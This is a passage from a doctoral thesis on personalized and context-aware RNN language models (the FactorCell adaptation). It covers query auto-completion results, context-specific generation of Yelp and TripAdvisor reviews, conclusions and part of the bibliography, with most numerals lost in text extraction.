tune the online learning rate to give the best perplexity on a held-out set of , queries, having previously verified (see figure . ) that perplexity is a good indicator of performance on the qac task. the learning rate is the only parameter that needs to be tuned for online learning. prefixes are selected uniformly at random with the constraint that they contain at least two characters in the prefix and that there is at least one character in the completion. to generate completions using beam search, we use a beam width of and a branching factor of . results are reported using mean reciprocal rank (mrr), the standard method of evaluating qac systems. it is the mean of the reciprocal rank of the true completion in the top ten proposed completions. the reciprocal rank is zero if the true completion is not in the top ten. neural models are compared against an mpc baseline. following (park and chiba, ), we remove queries seen less than three times from the mpc training data to avoid excessive memory usage. . . results the training objective, minimizing perplexity, differs from the evaluation metric, maximizing the mean reciprocal rank of the query completion. fortunately, the mismatch between met- rics is not large. as shown in figure . , perplexity correlates with mrr on the development data. table . compares the performance of the different models against the mpc baseline on a test set of one million queries from a user population that is disjoint with the training set. code is available at http://github.com/ajaech/query completion. figure . : perplexity versus mrr on the development data for different classes of models. results are presented separately for prefixes that are seen or unseen in the training data. if the prefix was not seen in the training data then the query is guaranteed to be relatively rare. consistent with prior work, the neural models do better than the mpc baseline. the personalized models are better than the unadapted one, and the factorcell model is the best overall in both the big and small sized experiments. figure . shows the relative improvement in mrr over an unpersonalized model versus the number of queries seen per user. both the factorcell and the concatcell show continued improvement as more queries from each user are seen, and the factorcell outperforms the concatcell by an increasing margin over time. in the long run, we expect that the system will have seen many queries from most users. therefore, the right side of figure . , where the factorcell is up to % better than the concatcell, is more representative of the relative performance of the two systems. since the data was collected over a limited time frame and half of all users have fifteen or fewer queries, the results in table . do not reflect the full benefit of personalization. figure . shows the mrr for different prefix and query lengths. we find that longer size model seen unseen all mpc . . . unadapted . . . (s) concatcell . . . factorcell . . . unadapted . . . (b) concatcell . . . factorcell . . . table . : mrr reported for seen and unseen prefixes for small (s) and big (b) models. figure . : relative improvement in mrr over the unpersonalized model versus queries seen using the large size models. plot uses a moving average of width to reduce noise. figure . : mrr by prefix and query lengths for the large factorcell and unadapted models with the first queries per user excluded. prefixes help the model make longer completions and (as expected) shorter completions have higher mrr. comparing the personalized model against the unpersonalized baseline, we see that the biggest gains are for short queries and prefixes of length one or two. we found that one reason why the factorcell outperforms the concatcell is that it is able to pick up sooner on the repetitive search behaviors that some users have. this commonly happens for navigational queries like when someone searches for the name of their favorite website once or more per day. at the extreme tail there are users who search for nothing but free online poker. both models do well on these highly predictable users but the factorcell is generally a bit quicker. we conducted an analysis to better understand what information is represented in the user embeddings and what makes the factorcell different from the concatcell. from a cold start user embedding we ran two queries and allowed the model to update the user embedding. then, we ranked the most frequent , queries based on the ratio of their likelihood from before and after updating the user embeddings. tables . , . , and . show the queries with the highest relative likelihood of the adapted vs. unadapted models after two related search queries: “high school softball” and factorcell concatcell high school musical horoscope chris brown high school musical funnyjunk.com homes for sale funbrain.com modular homes chat room hair styles table . : the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “high school softball” and “math homework help”. “math homework help” for table . , “prada handbags” and “versace eyewear” for table . , and “discount flights” and “yellowstone vacation packages” for table . . in all cases, the factorcell model examples are more semantically coherent than the concatcell examples. in the first case, the factorcell model identifies queries that a high school student might make, including entertainment sources and a celebrity entertainer popular with that demographic. in the second case, the factorcell model chooses retailers that carry woman’s apparel and those that sell home goods. while these companies’ brands are not as luxurious as prada or versace, most of the top luxury brand names do not appear in the top , queries and our model may not be capable of being that specific. there is no obvious semantic connection between the highest likelihood ratio phrases for the concatcell; it seems to be focusing more on orthography than semantics (e.g. “home” in the first example). in the last case, the factorcell suggests a map and four different airlines and the concatcell suggests a flight tracker (unlikely to be useful to someone looking to buy a ticket), a bank, and three reformulations of the original “discount flights” query. not shown are the queries which experienced the greatest decrease in likelihood. for the “high school” case, these included searches for travel agencies and airline tickets—websites not targeted towards the high school age demographic. factorcell concatcell neiman marcus craigslist nyc pottery barn myspace layouts jc penney verizon wireless verizon wireless jensen ackles bed bath and beyond webster dictionary table . : the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “prada handbags” and “versace eyewear”. factorcell concatcell yahoo maps flight tracker delta airlines suntrust bank alaska airlines cheap tickets us airways airline tickets southwest airlines cheap flights table . : the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “discount flights” and “yellowstone vacation packages”. . summary our experiments show that the lstm model can be improved using personalization. the method of adapting the recurrent layer clearly matters and we obtained an advantage by using the factorcell model. the reason the factorcell does better is in part attributable to having two to three times as many parameters in the recurrent layer as either the concatcell or the unadapted models. by design, the adapted weight matrix w′ only needs to be computed at most once per query and is reused many thousands of times during beam search. as a result, for a given number of floating point operations, the factorcell model outperforms the concatcell model for lstm adaptation. the cost for updating the user embeddings is similar to the cost of the forward pass and depends on the size of the user embedding, hidden state size, factorcell rank, and query length. in addition, we note that updates can be less frequent to reduce costs and in most cases there will be time between queries for updates. we showed that language model personalization can be effective even on users who are not seen during training. the benefits of personalization are immediate and increase over time as the system continues to leverage the incoming data to build better user representations. the approach can easily be extended to include time as an additional conditioning factor. we leave the question of whether the results can be improved by combining the language model with mpc for future work. chapter context-specific text generation context-specific generation is when a generative model is designed such that stylistic, topical, or other properties of the text can be specified when sampling from the model. one of the weaknesses of rnn language models is that it is difficult to control the content or the style of the text that they produce. it is natural to expect that if a language model is conditioned on a particular context then it will produce text that is appropriate for that context. conditioning, or adapting to, context is one way of controlling generation (ficler and goldberg, ) and that is the application that we explore in this chapter. we conduct experiments and analysis using the yelp restaurant review and the tripad- visor hotel review datasets from section . . these experiments reuse the models that were trained for the experiments in section . , including models adapted using the softmaxbias, concatcell, and factorcell strategies. the focus of the experiments in this chapter is to highlight differences in context-specificity between these models by generating reviews from the models and checking if the text is appropriate for the given context. the generated reviews are judged using a classifier that has been trained for that purpose. the automatic judgments are supplemented by human ratings to confirm the reliability of the classifier. there are ways of producing context-specific text without generating it from a language model such as by retrieving examples with matching context from the training data or combining retrieval with a neural edit model (li et al., ). our context-specificity metric will highly reward these types of models or any model that produces easy to classify content even if that content is unnatural or an outlier. retrieval-based methods may work well in certain applications but others require the use of a language model. this chapter focuses specifically on language models. we emphasize that a context-specificity metric by itself is not enough to judge the quality of a language model. low perplexity is important for good generation. however, a language model that has low perplexity and is also capable of context-specific generation will have more applications than a non-context-specific model. . text generation to generate text from an rnn, we use the model to predict the probability of observing each possible word as the next token in the sequence starting by inputting a special start of sentence token for w . the next token probabilities are given by the yt vector from equation . . one option is to take the next word as the highest probability entry in yt, known as greedy decoding. making greedy decisions can lead us down a path that is globally suboptimal and may not result in finding the sequence with the highest overall likelihood. instead, using an algorithm known as beam search, several possibilities are considered for the next word and are placed in a queue that holds the most likely word sequences found so far. beam search can find many high probability sentences but oftentimes it suffers from a lack of diversity. the highest probability sequences will all have considerable overlap with each other. this is not desirable in text generation because we generally want multiple texts with non-trivial differences to pick from and also because excessive repetition is tedious for human readers. a simple tweak that leads to more diverse generation is to stochastically expand the beam by sampling l items from the multinomial distribution given by yt instead of deterministically picking the top l words. when we use this technique we refer to it as a stochastic beam search. we can trade-off between the stochastic and deterministic versions of beam search by using a temperature parameter t in the softmax function as follows: softmax(xi) = exp(−xi t )∑ j exp(− xj t ) . ( . ) lowering the temperature t increases the concentration of probability mass at the head of the distribution. if the temperature is too high then the generated text can be nonsensical. if it is too low then the generation lacks diversity. in the limit when t goes to zero, it becomes equivalent to greedy decoding. so, finding the right balance is important. stochastic beam search deals with repetition between sampled texts. rnn language models also tend to use the same phrase repetitively within a single sentence or document, e.g. a restaurant review that says “the food was good and the service was great and the food was good and...”. to deal with this we use a heuristic that does not consider any beam expansion that would create a repeated trigram. several sophisticated techniques and heuristics exist (such as adding random penalties to subsets of the vocabulary (juuti et al., ) or having special models trained to enforce relevance and avoid contradiction and repetition (holtzman et al., )) but banning repeated trigrams is sufficient for our purpose of making a comparison between adaptation methods. . illustrative examples to start, we provide anecdotal examples in tables . , . , and . illustrating the behavior of each adaptation technique when generating yelp restaurant reviews given a star rating. in each case, a sentence template was selected and beam search decoding was used to find the highest probability word sequence that fits the gap in the template. this was repeated once for each of the possible star ratings from one to five. the sentence completions from the factorcell model are better matched to the specified star ratings. table . is probably the best example for the intensity of the selected adjectives to match with the corresponding star ratings. on the other hand, when using the concatcell model there is not a clear distinction between ratings. the concatcell picks the same completion for multiple star ratings (“loved it” in table . and “great!” in table . ) and in table . it gets the wrong polarity for the star rating completion. context factorcell concatcell softmaxbias stars it was amazing loved it ! it was amazing ! stars loved it ! loved it ! it was delicious stars it was great ! loved it ! had a blast stars it was horrible ! had a blast was disappointed star it was horrible ! it was horrible ! was disappointed table . : top completions for the sentence “my boyfriend and i ate here and !” after conditioning on each star rating. context factorcell concatcell softmaxbias stars amazing ! great ! delicious stars great ! great ! delicious stars good ! great ! delicious stars just meh mediocre mediocre star awful mediocre mediocre table . : top completions for the sentence “this was my first time coming here and the food was ” after conditioning on each star rating. context factorcell concatcell softmaxbias stars be back never go here never go here stars be back go never go here stars go back go never go here stars never go here never never go here star never go here never never go table . : top completions for the sentence “i will again” after conditioning on each star rating. . experiments and analysis . . yelp restaurant reviews to quantify the differences between models, we sampled , yelp reviews from different models. the models differ in their adaptation method but also in their lstm size and other hyperparameters including random word embedding sizes, epochs, context embedding size and factorcell rank. having variation in the hyperparameter settings allows us to analyze the relationship between perplexity and context-specificity, among other things. the generation used stochastic beam search with a temperature of . , a beam width of and a total beam size of . only the first words of the review were generated and the beam was constrained to not allow repeated trigrams as a heuristic to avoid excessive repetition. a discriminative classifier was trained to predict star rating on the same data that was used to train the language models. we used the fasttext model because it is near state-of-the-art and it can be efficiently trained and evaluated (grave et al., b). this classifier was used to judge the generated reviews to see if they conform to their given ratings. this strategy was used by hu et al. ( ) to evaluate “controllable” text generation. it is also similar to the text generation evaluation used by ficler and goldberg ( ) except that for some attributes they used hand-crafted decision rules instead of a statistical classifier and for other attributes deemed too difficult to classify they used human evaluation. there are multiple ways to report the judgment of the discriminative classifier. the most straightforward is accuracy, which is the percentage of times where the most probable rating according to the classifier matched the context given to the language model. in addition to this metric, we report results in terms of mean absolute deviation (the average absolute difference between the desired rating and the predicted rating). achieving perfect accuracy is not realistic for this task because there is some natural ambiguity between adjacent star ratings. the fasttext classifier has an accuracy of % and a median absolute deviation (mad) of . stars on the yelp test data. figure . plots the context classification metric from chapter (accuracy of classifying figure . : context classification accuracy versus generation context-specificity for each type of adaptation on the yelp data. actual reviews using the language model as a classifier) against the generation context- specificity metric (accuracy of classifying automatically generated text with a classifier trained on actual reviews). each point in this plot is an independent model trained with random hyperparameters. the context classification accuracy is highly predictive of the generation context-specificity. thus, it is not surprising that the factorcell models are the most controllable followed by the concatcell models and then the softmaxbias models. as shown in figure . , there is a strong correlation between factorcell rank and context- specificity (r = . ) but no relationship (r = . ) with perplexity. having low perplexity is obviously important for high-quality generation but low perplexity by itself is not an indicator that the generated text will match the specified conditions. we included some additional models here that were no used in the experiments in chapter and were trained with bigger (up to double the size) lstm hidden states. this is to address the question of whether the gap between models is reduced simply by training a bigger model. the bigger lstm states do help with perplexity, but we find little to no impact on context-specificity. table . lists the perplexity, automatically assessed generation accuracy, and the mean figure . : plot of factorcell rank and perplexity against generation context-specificity accuracy for factorcell models on the yelp restaurant data. model acc mad ppl unadapted . . . softmaxbias . . . concatcell . . . factorcell . . . table . : automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the yelp data. absolute deviation for each of the four classes of models. using human raters on a subset of the generated reviews, we confirm that the automatic judgments are correlated with human judgments with r = . . nine raters judged a set of reviews for this analysis. the raters were able to guess the intended star rating % of the time for the factorcell compared to only % of the time for the concatcell. . . tripadvisor hotel reviews we conduct a similar analysis using the tripadvisor hotel review data and models from chapter and check that the hotel class property matches with the generated text. hotel class is a rating that is reflective of the quality of the service and amenities offered by the hotel and is measured in half integer increments. only the identity of the hotels and the star rating (sentiment) of each review is provided during training and any information the model learns about class must be derived from the text of the review. hotel reviews are sampled using a temperature of . , a beam width of and a beam size of . only the first to words of each review were generated and , samples were collected from independent models. when generating the hotel reviews we pick a random hotel identifier for each one and fix the sentiment at five stars. like before, these models use a range of hyperparameters in order to study the relationship between the capacity of the model and its performance. the fasttext classifier predicts hotel class with an accuracy of % and a mean absolute deviation of . on the tripadvisor test data. using this classifiers to judge the generated reviews, we find that the factorcell is the the most specific for the hotel class. the complete metrics are in table . . besides their lack of context-specificity, the unadapted models also suffer from lack of diversity. the unadapted models tend to default to generating reviews that match the largest region in the data, new york city. up to % of the generated reviews from the unadapted models mention the empire state building (compared to % to % for the adapted models) even though only % of the training data are from hotels in new york city and only . % of that % even mention the empire state building. conditioning on context model acc mad ppl unadapted . . . softmaxbias . . . concatcell . . . factorcell . . . table . : automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the tripadvisor data. information makes it easier to guide the generation away from the mode and towards more diverse samples. as shown in figure . , increasing the factorcell rank helps with context-specificity of the hotel class just as it did with controlling the star rating of the yelp reviews in figure . . however, instead of a lack of correlation with perplexity, we see that models with better perplexity also do better at context-specificity. same as for the hotel reviews, the accuracy of the models when used as generative text classifiers is predictive of their performance for context-specific generation. we show this relationship in figure . . we used the tripadvisor models to test if the difference in context-specificity between the models was due to the quality of the representation learned in the hotel embeddings. we trained a gradient boosted decision tree to predict the hotel class using the hotel embedding as features. as we saw in figure . , the hotel embeddings naturally group together by class even though they hotel class labels were not available during training. using five-fold cross validation on the , embeddings, we found little to no difference between models with both the concatcell and factorcell correctly predicting the class in . % of cases versus . % for the softmaxbias model. figure . : context-specificity of hotel class versus factorcell rank and perplexity in gener- ated reviews using the models learned on the tripadvisor data. figure . : context classification accuracy versus generation context-specificity for each type of adaptation on the tripadvisor data. . summary recall that the concatcell model only adapts the recurrent layer bias vector. assuming -dimensional word embeddings and a dimensional lstm, only , or . % of the recurrent layer parameters change depending on the context. in contrast, a factorcell model with the same embedding size and recurrent layer dimension and a rank of has . % of its recurrent layer parameters changing depending on context. that’s more than times as many as the concatcell. when so few of the parameters are adapted, the result is a blurring of the distinctions between different contexts. we saw this qualitatively in the restaurant review sentence completions and quantitatively when measuring the context-specificity of the restaurant review star rating and the hotel review class. in chapter , we used a context classification metric whereby the language model was used as a generative text classifier on held-out data in order to test its ability to understand the relationship between context and language. the experiments in this chapter show that the context classification metric is a useful predictor of text generation context-specificity. this means that we can assess the relative context-specificity of models independently of the generation hyperparameters (beam size, temperature, etc.) and without the need to construct a classifier or use human ratings to do judgments. this is useful because there are cases where a high quality classifier may not be readily available. for human ratings, not only are they expensive and time-consuming to collect, but there are also certain contexts where humans may be poor judges without special experience or training. our method of evaluating context-specificity of the generated text has some limitations. because the fasttext classifier is trained on the same data as the language model, it has the potential to reward the language model for memorizing portions of the training data instead of generating novel sentences. additionally, as we mentioned in the introduction to this chapter, context-specificity alone is not enough to evaluate a language model because it does not measure the ability of the model to generate well-formed text that is free from excessive repetitions and self-contradictions. we know from chapter that the factorcell model does have a perplexity that is comparable or better than baseline methods. however, a more comprehensive assessment is needed to take into account all of the desired attributes. chapter conclusions and future directions the fact that language changes so dramatically from one situation to the next is both a challenge and an opportunity. it is a challenge because changes in context that may seem trivial to us as humans are enough to break a language model. it is an opportunity because dramatic changes means that large benefits can be accrued through adaptation. as an illus- tration, the amazon alexa prize encouraged people to speak to their device using an open-ended conversational style. this was a change from the task-oriented style that peo- ple normally used to speak with their home assistants. initially, a generic language model was used for the conversational interactions. when a language model targeting conversa- tional speech was introduced the recognition word error rate dropped by one third (ram et al., ). adjusting the language model was crucial to enabling people to have long conversations with alexa. adaptation is vital to the success of language modeling in real applications and is the reason why this work can have high impact. in this chapter we summarize the contributions of the thesis and suggest possible directions for future work. . summary of contributions our main contribution is the introduction of the factorcell model, a new way of thinking about how to adapt the recurrent layer. the factorcell model moves beyond the paradigm set by mikolov and zweig ( ) and used many times since then. the benefits of the factorcell model include: • a re-conception of the mechanism for recurrent layer adaptation (using context to transform the model rather than as an additional input); • permitting context to affect a greater change in the model parameters (and therefore its predictions) than what is possible using prior methods; • including a rank hyperparameter that smoothly trades off between the case where most information is shared between contexts and the opposite situation where the contexts are mostly modeled independently; • maintaining the property of the concatcell approach that the adapted weights can be precomputed and cached resulting in negligible computational overhead compared to an unadapted baseline; and • off-loading of context specific information from the main recurrent weight matrix to special adaptation tensors, which helps prevent the blurring of the boundary between related contexts. we presented experimental results on nine distinct datasets. three of them used character- level vocabularies and the other six operated at the word level. one dataset comprised tran- scripts of spoken language; some involved informal written language; and some were more formal. the biggest dataset had over million words of text for training and the smallest was just million characters. in every situation where it was tested, the factorcell model gave the best perplexity. however the benefits are greater for some contexts. the diversity of data helped to increase the robustness of our conclusions and led us to make some guide- lines about when different aspects of adaptation become more or less important. specifically, adapting the softmax bias is most effective for topic-based contexts and potentially less ef- fective when the recurrent layer dimensionality is large. also, the contexts that are most amenable to adaptation are specific and are not easily predicted from a short window of text. an idea that we encountered more than once is that there are differences between models that are not captured by perplexity. in chapters and , we saw that a more flexible adap- tation of the recurrent layer helped the models better distinguish contexts in classification experiments and chapter showed how models that are better at distinguishing contexts can be used for context-specific generation. there were two places where we saw clear qualitative differences between the factorcell and the concatcell. in chapter , the factorcell discovered semantic associations between search queries whereas the concatcell failed to find such associations and sometimes seemed to focus more on orthography. in chapter , the concatcell blurred the boundary between star rating levels (associated with sentiment) and the factorcell was able to make cleaner distinctions. taken together, these indicate the factorcell provides a greater benefit than the improvement in perplexity would suggest. this is likely because the gains are on less frequently used words, and perplexity is dominated by frequent words. we showed how online learning lets the adapted model take advantage of contexts that emerge after training. the method of online adaptation that we introduced in chapter is generic; it will work for multiple adaptation strategies, including the concatcell. however, the factorcell makes better use of the data stream to continue to increase the quality of its predictions over time. we made some observations about what factors make a dataset more or less amenable to adaptation. these include, from chapter , that context variables that are easily predictable from the text alone are unlikely to be helpful and, from chapter , that for topic related contexts adapting the softmax bias may be more successful. we also found that having a larger sized recurrent layer can lessen the impact of adapting the softmax bias. . future directions there are several promising future directions that build on the work in this thesis. in all six tasks that are explored in chapter , all context factors are available for all training and testing samples. in some scenarios, it may be possible for some context factors to be missing. a simple solution for handling this is to use the expected value for the missing variable(s), since this is equivalent to using a weighted combination of the adaptation matrices for the different possible values of the missing variables. the experiment scenarios all used metadata to specify context, since this type of context can be more sensitive to data sparsity and has been less studied. in contrast, in many prior studies of language model adaptation, context is specified in terms of text samples, such as prior user queries, prior sentences in a dialog, other documents related in terms of topic or style, etc. the factorcell framework introduced here is also applicable to this type of context, but the best encoding of the text into an embedding (e.g. using bag of words, sequence models, etc.) is likely to vary with the application and remains an area of study for future work. the generation experiments that we conducted were generating text from scratch with no objective other than to obey the constraints imposed by conditioning on the context. in applications, such as machine translation, the generation is conditioned on a source sequence in an encoder-decoder model (also called sequence-to-sequence, or seq seq) (cho et al., ). the factorcell model is applicable in these situations as well and one future direction is to test how it performs in that setting. prior work has already shown that a simple language model that incorporates contextual data can provide gains in machine translation (drexler et al., ). the data we used consisted of one or two context variables such as latitude and longitude or a hotel identifier and star rating. in these cases, it was reasonable to expect the context embedding to summarize the relevant information from both variables. if there were many more context variables then that assumption may no longer hold. more work is needed to find an appropriate dataset that has multiple context variables and to investigate appropriate methods of providing the context information to the factorcell model. in chapter , we showed that using hashing to adapt the output layer bias benefits per- plexity for high dimensional contexts. this indicates that the low-rank adaptation of the bias does not fully model the context-dependent language. we suggested that the model could benefit from a sparse correction to the low-rank adaptation and that could be accom- plished by including an l penalty term to the adaptation parameters. this idea is partially explored in appendix a, but more work is needed to investigate the benefits of sparsity in language model adaptation. our focus was on language modeling, but rnns are widely used in many other natural language processing tasks and in other domains that have little or nothing to do with language such as acoustic modeling (graves et al., ), time-series analysis, music generation (goel et al., ), and more. for example, some work on other natural language processing tasks, such as spoken language understanding, have already made use of the concatcell style adaptation (mesnil et al., ). personalization would be of high utility in these applications. this thesis looked at query completion, but there are often text prediction applications that this work is relevant to, including next word prediction for mobile text input and augmentative communication for people with disabilities. for augmentative communications, the method would also apply to icon-based communication, which relies on a language model with icons instead of words or characters (dudy and bedrick, ). it is difficult to predict what future state-of-the-art language models will look like. re- current neural networks have been reliable winners for the past few years. there is active work on alternate architectures that remedy some of the perceived weaknesses (mostly lack of easy parallelism) of the rnn, such as the quasi-recurrent neural network (bradbury et al., ) and the transformer network (vaswani et al., ). it seems likely that the adaptation techniques from this thesis will apply to those architectures as well, but it remains to be tested. bibliography jimmy lei ba, jamie ryan kiros, and geoffrey e hinton. . layer normalization. arxiv preprint arxiv: . . dzmitry bahdanau, jan chorowski, dmitriy serdyuk, yoshua bengio, et al. . end-to- end attention-based large vocabulary speech recognition. in proc. icassp, pages – . lalit bahl, james baker, paul cohen, fred jelinek, burn lewis, and r mercer. . recog- nition of continuously read natural corpus. in proc. icassp, volume , pages – . ziv bar-yossef and naama kraus. . context-sensitive query auto-completion. in proc. www, pages – . jerome r bellegarda. . exploiting latent semantic information in statistical language modeling. proceedings of the ieee, ( ): – . jerome r bellegarda. . statistical language model adaptation: review and perspectives. speech communication, ( ): – . yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. a. a neural probabilistic language model. journal of machine learning research, (feb): – . yoshua bengio, jean-sébastien senécal, et al. b. quick training of probabilistic neural nets by importance sampling. in proc. aistats. steven bird, ewan klein, and edward loper. . natural language processing with python. o’reilly media. burton h bloom. . space/time trade-offs in hash coding with allowable errors. com- munications of the acm, ( ): – . samuel r. bowman, luke vilnis, oriol vinyals, andrew dai, rafal jozefowicz, and samy bengio. . generating sentences from a continuous space. in proceedings of the th signll conference on computational natural language learning, pages – . association for computational linguistics. james bradbury, stephen merity, caiming xiong, and richard socher. . quasi-recurrent neural networks. proc. iclr. thorsten brants, ashok c popat, peng xu, franz j och, and jeffrey dean. . large language models in machine translation. in proc. emnlp. peter f brown, peter v desouza, robert l mercer, vincent j della pietra, and jenifer c lai. . class-based n-gram models of natural language. computational linguistics, ( ): – . ivan bulyko, mari ostendorf, and andreas stolcke. . getting more mileage from web text sources for conversational speech language modeling using class-dependent mixtures. in proc. hlt-naacl, pages – . fei cai, maarten de rijke, et al. . a survey of query auto-completion in information retrieval. foundations and trends in information retrieval, ( ): – . fei cai, shangsong liang, and maarten de rijke. . time-sensitive personalized query auto-completion. in proc. cikm, pages – . william chan, navdeep jaitly, quoc v le, and oriol vinyals. . listen, attend and spell. arxiv preprint arxiv: . . ciprian chelba and noam shazeer. . sparse non-negative matrix language modeling for geo-annotated query session data. in proc. automatic speech recognition and under- standing (asru), ieee workshop on, pages – . ciprian chelba, xuedong zhang, and keith b hall. . geo-location for voice search language modeling. in proc. interspeech, pages – . wenlin chen, david grangier, and michael auli. . strategies for training large vocab- ulary neural language models. in proc. acl. xie chen, tian tan, xunying liu, pierre lanchantin, moquan wan, mark jf gales, and philip c woodland. . recurrent neural network language model adaptation for multi- genre broadcast speech recognition. in proc. interspeech. kyunghyun cho, bart van merriënboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representa- tions using rnn encoder-decoder for statistical machine translation. arxiv preprint arxiv: . . junyoung chung, kyunghyun cho, and yoshua bengio. . a character-level decoder without explicit segmentation for neural machine translation. in proc. acl. mathias creutz, teemu hirsimäki, mikko kurimo, antti puurula, janne pylkkönen, ṽesa siivola, matti varjokallio, ebru arisoy, murat saraçlar, and andreas stolcke. . morph- based speech recognition and modeling of out-of-vocabulary words across languages. acm transactions on speech and language processing (tslp), ( ): . salil deena, madina hasan, mortaza doulaty, oscar saz, and thomas hain. . com- bining feature and model-based adaptation of rnnlms for multi-genre broadcast speech recognition. in proc. interspeech, pages – . renato demori and marcello federico. . language model adaptation. in computational models of speech pattern processing, pages – . adji b dieng, chong wang, jianfeng gao, and john paisley. . topicrnn: a recurrent neural network with long-range semantic dependency. arxiv preprint arxiv: . . jennifer drexler, pushpendre rastogi, jacqueline aguilar, benjamin van durme, and matt post. . a wikipedia-based corpus for contextualized machine translation. in proc. lrec, pages – . shiran dudy and steven bedrick. . compositional language modeling for icon-based augmentative and alternative communication. northwest nlp regional workshop. j. eisenstein, a. ahmed, and e. xing. a. sparse additive generative models of text. in proc. icml. jacob eisenstein, amr ahmed, and eric p. xing. b. sparse additive generative models of text. in proc. icml. jacob eisenstein, brendan o’connor, noah a smith, and eric p xing. . a latent variable model for geographic lexical variation. in proc. emnlp, pages – . jessica ficler and yoav goldberg. . controlling linguistic style aspects in neural language generation. in proc. emnlp workshop on stylistic variation. siva reddy gangireddy, pawel swietojanski, peter bell, and steve renals. . unsuper- vised adaptation of recurrent neural network language models. in proc. interspeech, pages – . roberto gemello, franco mana, stefano scanzio, pietro laface, and renato de mori. . linear hidden transformations for adaptation of hybrid ann/hmm models. speech com- munication, ( - ): – . shalini ghosh, oriol vinyals, brian strope, scott roy, tom dean, and larry heck. . contextual lstm models for large scale nlp tasks. arxiv preprint arxiv: . . james r glass, timothy j hazen, d scott cyphers, igor malioutov, david huynh, and regina barzilay. . recent progress in the mit spoken lecture processing project. in proc. interspeech, pages – . kratarth goel, raunaq vohra, and jk sahoo. . polyphonic music generation by mod- eling temporal dependencies using a rnn-dbn. in proc. international conference on artificial neural networks, pages – . ian j goodfellow, mehdi mirza, da xiao, aaron courville, and yoshua bengio. . an empirical investigation of catastrophic forgetting in gradient-based neural networks. arxiv preprint arxiv: . . edouard grave, armand joulin, and nicolas usunier. a. improving neural language models with a continuous cache. in proc. iclr, volume abs/ . . edouard grave, tomáš mikolov, armand joulin, and piotr bojanowski. b. bag of tricks for efficient text classification. in eacl. alex graves, santiago fernández, faustino gomez, and jürgen schmidhuber. . connec- tionist temporal classification: labelling unsegmented sequence data with recurrent neural networks. in proc. icml, pages – . acm. alex graves and navdeep jaitly. . towards end-to-end speech recognition with recurrent neural networks. in proc. icml, volume , pages – . klaus greff, rupesh k srivastava, jan koutńık, bas r steunebrink, and jürgen schmid- huber. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems, : – . david ha, andrew dai, and quoc v le. . hypernetworks. in proc. iclr. yoni halpern, keith hall, vlad schogol, michael riley, brian roark, gleb skobeltsyn, and martin baeuml. . contextual prediction models for speech recognition. in proc. interspeech. bo han, paul cook, and timothy baldwin. . text-based twitter user geolocation pre- diction. j. artif. intell. res., : – . awni hannun, carl case, jared casper, bryan catanzaro, greg diamos, erich elsen, ryan prenger, sanjeev satheesh, shubho sengupta, adam coates, et al. . deep speech: scaling up end-to-end speech recognition. arxiv preprint arxiv: . . cong duy vu hoang, trevor cohn, and gholamreza haffari. . incorporating side infor- mation into recurrent neural network language models. in proc. hlt-naacl. ari holtzman, jan buys, maxwell forbes, antoine bosselut, and yejin choi. . https://openreview.net/forum?id=r lfpfzab learning to write by learning the objective. bo-june paul hsu and james glass. . n-gram weighting: reducing training data mis- match in cross-domain language model estimation. in proc. emnlp, pages – . zhiting hu, zichao yang, xiaodan liang, ruslan salakhutdinov, and eric p xing. . toward controlled generation of text. in proc. icml, pages – . b. hutchinson, m. ostendorf, and m. fazel. . a sparse plus low-rank exponential language model for limited resource scenarios. ieee trans. audio, speech and language processing, ( ): – . brian hutchinson, mari ostendorf, and maryam fazel. . exceptions in language as learned by the multi-factor sparse plus low-rank language model. in proc. icassp, pages – . hakan inan, khashayar khosravi, and richard socher. . tying word vectors and word classifiers: a loss framework for language modeling. arxiv preprint arxiv: . . kazuki irie, shankar kumar, michael nirschl, and hank liao. . radmm: recurrent adaptive mixture model with applications to domain robust language modeling. aaron jaech, george mulcaire, shobhit hathi, mari ostendorf, and noah a smith. . hierarchical character-word models for language identification. in emnlp workshop on nlp for social media,. aaron jaech and mari ostendorf. . leveraging twitter for low-resource conversational speech language modeling. arxiv preprint arxiv: . . aaron jaech and mari ostendorf. . http://ajaech.me/adeeehllnorru improving context aware language models. arxiv preprint arxiv: . . aaron jaech and mari ostendorf. a. low-rank rnn adaptation for context-aware lan- guage modeling. tacl. aaron jaech and mari ostendorf. b. personalized language model for query auto- completion. in proc. acl. sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vocabulary for neural machine translation. in proc. acl-ijcnlp. fred jelinek. . self-organized language modeling for speech recognition. readings in speech recognition, pages – . fred jelinek. . up from trigrams. in proc. eurospeech. fred jelinek, bernard mérialdo, salim roukos, and m. strauss. . a dynamic language model for speech recognition. in proc. hlt. yangfeng ji, trevor cohn, lingpeng kong, chris dyer, and jacob eisenstein. . docu- ment context language models. arxiv preprint arxiv: . . mika juuti, bo sun, tatsuya mori, and n asokan. . stay on-topic: generating context- specific fake restaurant reviews. arxiv preprint arxiv: . . andrej karpathy, justin johnson, and li fei-fei. . visualizing and understanding recurrent networks. in proc. iclr. slava katz. . estimation of probabilities from sparse data for the language model component of a speech recognizer. ieee transactions on acoustics, speech, and signal processing, ( ): – . diederik p kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . katrin kirchhoff and mei yang. . improved language modeling for statistical machine translation. in proc. of the acl workshop on building and using parallel texts, pages – . reinhard kneser and hermann ney. . improved backing-off for m-gram language mod- eling. in proc. icassp, volume , pages – . ben krause, emmanuel kahembwe, iain murray, and steve renals. . dynamic evalua- tion of neural sequence models. arxiv preprint arxiv: . . oleksii kuchaiev and boris ginsburg. . factorization tricks for lstm networks. arxiv preprint arxiv: . . roland kuhn and renato de mori. . a cache-based natural language model for speech recognition. ieee transactions on pattern analysis and machine intelligence, ( ): – . jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural ma- chine translation without explicit segmentation. tacl, : – . tao lei, yu xin, yuan zhang, regina barzilay, and tommi s. jaakkola. . low-rank tensors for scoring dependency structures. in acl. jiwei li, michel galley, chris brockett, jianfeng gao, and bill dolan. . a persona-based neural conversation model. proc. 